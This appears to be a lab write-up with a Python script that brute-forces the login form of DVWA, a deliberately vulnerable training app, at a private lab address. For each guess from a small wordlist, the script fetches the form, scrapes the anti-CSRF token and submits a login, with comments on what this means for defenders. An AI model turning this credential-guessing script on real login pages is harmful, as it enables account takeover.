dvwa - brute force - middle -python

密碼文件psw.txt跟python文件同級目錄下,內容:

111
222
password
444
5555555555555555

test.py內容如下:

import requests
import re,time

# Request headers sent with every call in this script. The values were
# captured from a browser session against the lab host 192.168.1.70.
# NOTE(review): the accompanying write-up is titled "middle", but the Cookie
# below selects security=high; confirm which DVWA level is intended.
head = {
    'Host': '192.168.1.70',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': (
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
        '(KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'
    ),
    'Accept': (
        'text/html,application/xhtml+xml,application/xml;q=0.9,'
        'image/webp,image/apng,*/*;q=0.8'
    ),
    # Referer captured from the browser; the user_token inside it is a stale
    # sample and is not the token submitted with each attempt.
    'Referer': (
        'http://192.168.1.70/dvwa/vulnerabilities/brute/index.php'
        '?username=admin&password=111&Login=Login'
        '&user_token=bbf84925fed8ba075c4e8b39f370e9bc'
    ),
    'Accept-Language': 'zh-CN,zh;q=0.9',
    # Copy the PHPSESSID from the browser after logging in to DVWA. It is a
    # session credential: it expires, and it identifies the logged-in user.
    'Cookie': 'security=high; PHPSESSID=61b69n6238mpdhu05puisaok00',
    'Connection': 'close',
}

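# Lab exercise against the DVWA brute-force page: for each candidate in
# psw.txt, fetch the form, read the per-request user_token from the HTML and
# submit one login attempt carrying that token. Prints the candidate and the
# response length so that a differing length stands out.
#
# What this shows from the defender's side: the user_token is an anti-CSRF
# control. Any client that can load the form can read the token, so it does
# not limit the guessing rate; server-side throttling or account lockout does.
# The login is a GET, so every attempted password is carried in the query
# string and ends up in web-server access logs. The pattern is one form fetch
# followed by one login request per attempt, all from the same session.
url = r'http://192.168.1.70/dvwa/vulnerabilities/brute/'
dvwa_session = requests.Session()
print(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime()))

# `with` closes psw.txt even when a request or the token lookup raises.
with open('psw.txt', 'r') as file:
    for line in file:
        # A timeout keeps the script from hanging forever on a dead lab host.
        resp = dvwa_session.get(url=url, headers=head, timeout=10)

        # The first 32-character [a-z0-9] run in the page is taken to be the
        # user_token. NOTE(review): the pattern is not anchored to the hidden
        # field, so it relies on no other such run appearing earlier.
        match = re.search(r'[a-z0-9]{32}', resp.text)
        if match is None:
            # Without this check the original failed with an opaque
            # AttributeError on `.group()`. One possible cause is an expired
            # PHPSESSID, so that the form page is not what was returned.
            raise RuntimeError(
                'no user_token found in the form page (HTTP %d); '
                'check the PHPSESSID in head' % resp.status_code
            )
        token = match.group()
        password = line.rstrip()

        # Let requests build the query string so characters such as '&', '#'
        # or spaces in a candidate are percent-encoded, not spliced raw into
        # the URL where they would corrupt the other parameters.
        res = dvwa_session.get(
            url=url + 'index.php',
            params={
                'username': 'admin',
                'password': password,
                'Login': 'Login',
                'user_token': token,
            },
            headers=head,
            timeout=10,
        )

        print(password.strip(),len(res.text))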

 
